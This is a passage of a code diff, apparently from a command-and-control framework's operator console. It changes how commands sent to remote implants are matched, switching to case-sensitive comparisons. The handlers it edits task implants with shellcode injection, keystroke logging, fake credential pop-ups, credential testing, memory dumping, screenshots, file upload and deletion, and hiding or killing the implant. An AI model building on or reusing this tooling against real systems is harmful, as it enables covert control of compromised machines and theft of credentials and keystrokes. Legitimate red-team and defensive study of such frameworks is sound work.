if searchterm in line.lower():
|
||||
print (line)
|
||||
|
||||
elif "upload-file" in command.lower():
|
||||
elif "upload-file" in command:
|
||||
source = ""
|
||||
destination = ""
|
||||
s = ""
|
||||
if command.strip().lower() == "upload-file":
|
||||
if command.lower() == "upload-file":
|
||||
source = readfile_with_completion("Location of file to upload: ")
|
||||
while not os.path.isfile(source):
|
||||
print("File does not exist: %s" % source)
|
||||
|
|
@ -65,17 +74,17 @@ def handle_sharp_command(command, user, randomuri, startup):
|
|||
print ("Error with source file: %s" % e)
|
||||
traceback.print_exc()
|
||||
|
||||
elif "unhide-implant" in command.lower():
|
||||
elif "unhide-implant" in command:
|
||||
unhide_implant(randomuri)
|
||||
|
||||
elif "hide-implant" in command.lower():
|
||||
elif "hide-implant" in command:
|
||||
kill_implant(randomuri)
|
||||
|
||||
elif "safetydump" in command.lower():
|
||||
elif "safetydump" in command:
|
||||
check_module_loaded("SafetyDump.exe", randomuri, user)
|
||||
new_task(command, user, randomuri)
|
||||
|
||||
elif "inject-shellcode" in command.lower():
|
||||
elif "inject-shellcode" in command:
|
||||
params = re.compile("inject-shellcode", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
path = readfile_with_completion("Location of shellcode file: ")
|
||||
|
|
@ -86,7 +95,7 @@ def handle_sharp_command(command, user, randomuri, startup):
|
|||
except Exception as e:
|
||||
print ("Error loading file: %s" % e)
|
||||
|
||||
elif "kill-implant" in command.lower() or "exit" in command.lower():
|
||||
elif "kill-implant" in command or "exit" in command:
|
||||
impid = get_implantdetails(randomuri)
|
||||
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
|
||||
if ri.lower() == "n":
|
||||
|
|
@ -98,78 +107,78 @@ def handle_sharp_command(command, user, randomuri, startup):
|
|||
new_task("exit",user, randomuri)
|
||||
kill_implant(randomuri)
|
||||
|
||||
elif "seatbelt " in command.lower():
|
||||
elif "seatbelt " in command:
|
||||
check_module_loaded("Seatbelt.exe", randomuri, user)
|
||||
new_task(command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("stop-keystrokes")):
|
||||
elif (command.startswith("stop-keystrokes")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("get-keystrokes")):
|
||||
elif (command.startswith("get-keystrokes")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("get-screenshotmulti")):
|
||||
elif (command.startswith("get-screenshotmulti")):
|
||||
new_task(command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("get-screenshot")):
|
||||
elif (command.startswith("get-screenshot")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("arpscan")):
|
||||
elif (command.startswith("arpscan")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("testadcredential")):
|
||||
elif (command.startswith("testadcredential")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("testlocalcredential")):
|
||||
elif (command.startswith("testlocalcredential")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("turtle")):
|
||||
elif (command.startswith("turtle")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("get-userinfo")):
|
||||
elif (command.startswith("get-userinfo")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("get-content")):
|
||||
elif (command.startswith("get-content")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("resolvednsname")):
|
||||
elif (command.startswith("resolvednsname")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("resolveip")):
|
||||
elif (command.startswith("resolveip")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("cred-popper")):
|
||||
elif (command.startswith("cred-popper")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("get-serviceperms")):
|
||||
elif (command.startswith("get-serviceperms")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("move")):
|
||||
elif (command.startswith("move")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("delete")):
|
||||
elif (command.startswith("delete")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower().startswith("ls")):
|
||||
elif (command.startswith("ls")):
|
||||
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
||||
|
||||
elif (command.lower() == "pwd") or (command.lower() == "pwd "):
|
||||
elif (command == "pwd") or (command == "pwd "):
|
||||
new_task("run-exe Core.Program Core pwd", user, randomuri)
|
||||
|
||||
elif (command.lower() == "ps") or (command.lower() == "ps "):
|
||||
elif (command == "ps") or (command == "ps "):
|
||||
new_task("run-exe Core.Program Core Get-ProcessList", user, randomuri)
|
||||
|
||||
elif "loadmoduleforce" in command.lower():
|
||||
elif "loadmoduleforce" in command:
|
||||
params = re.compile("loadmoduleforce ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
check_module_loaded(params, randomuri, user, force=True)
|
||||
|
||||
elif "loadmodule" in command.lower():
|
||||
elif "loadmodule" in command:
|
||||
params = re.compile("loadmodule ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
check_module_loaded(params, randomuri, user)
|
||||
|
||||
elif "listmodules" in command.lower():
|
||||
elif "listmodules" in command:
|
||||
modules = os.listdir("%s/Modules/" % POSHDIR)
|
||||
print ("")
|
||||
print ("[+] Available modules:")
|
||||
|
|
@ -179,17 +188,17 @@ def handle_sharp_command(command, user, randomuri, startup):
|
|||
print (mod)
|
||||
new_task(command, user, randomuri)
|
||||
|
||||
elif "modulesloaded" in command.lower():
|
||||
elif "modulesloaded" in command:
|
||||
ml = get_implantdetails(randomuri)
|
||||
print (ml[14])
|
||||
|
||||
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
|
||||
elif command == "help" or command == "?" or command == "help ":
|
||||
print (sharp_help1)
|
||||
|
||||
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
|
||||
startup(user)
|
||||
|
||||
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
|
||||
elif ('beacon' in command and '-beacon' not in command) or 'set-beacon' in command or 'setbeacon' in command:
|
||||
new_sleep = command.replace('set-beacon ', '')
|
||||
new_sleep = new_sleep.replace('setbeacon ', '')
|
||||
new_sleep = new_sleep.replace('beacon ', '').strip()
|
||||
|
|
@ -201,7 +210,7 @@ def handle_sharp_command(command, user, randomuri, startup):
|
|||
new_task(command, user, randomuri)
|
||||
update_sleep(new_sleep, randomuri)
|
||||
|
||||
elif (command.lower().startswith('label-implant')):
|
||||
elif (command.startswith('label-implant')):
|
||||
label = command.replace('label-implant ', '')
|
||||
update_label(label, randomuri)
|
||||
startup(user)
|
||||
|
|
|
|||
4
Tasks.py
4
Tasks.py
|
|
@ -19,10 +19,10 @@ def newTask(path):
|
|||
user_command = command
|
||||
hostinfo = DB.get_hostinfo(RandomURI)
|
||||
now = datetime.datetime.now()
|
||||
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode")) :
|
||||
if (command.startswith("$shellcode64")) or (command.startswith("$shellcode86") or command.startswith("run-exe core.program core inject-shellcode")) :
|
||||
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
|
||||
command = command[:command.index("#")]
|
||||
elif (command.lower().startswith('upload-file')):
|
||||
elif (command.startswith('upload-file')):
|
||||
filepath = command.replace('upload-file', '')
|
||||
if ";" in filepath:
|
||||
filepath = filepath.split(";")[1].strip()
|
||||
|
|
|
|||
Loading…
Reference in New Issue